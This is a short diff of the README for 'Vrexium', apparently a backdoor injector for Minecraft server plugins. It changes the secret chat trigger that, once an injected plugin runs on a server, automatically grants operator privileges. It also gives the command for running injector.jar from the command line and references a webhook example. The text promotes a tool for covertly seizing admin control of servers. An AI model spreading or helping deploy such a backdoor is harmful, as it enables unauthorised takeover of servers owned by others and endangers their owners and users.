M1noa/Vrexium/README.md

 <img src="/images/webhook_example.png">

 ## Usage
-Once the plugin is enabled on a server, type `~ectasy~` in the chat, to automatically gain op privileges.
+Once the plugin is enabled on a server, type `~vrex~` in the chat, to automatically gain op privileges.

 ## CLI
 If you want to access the CLI, use `java -jar injector.jar --nogui`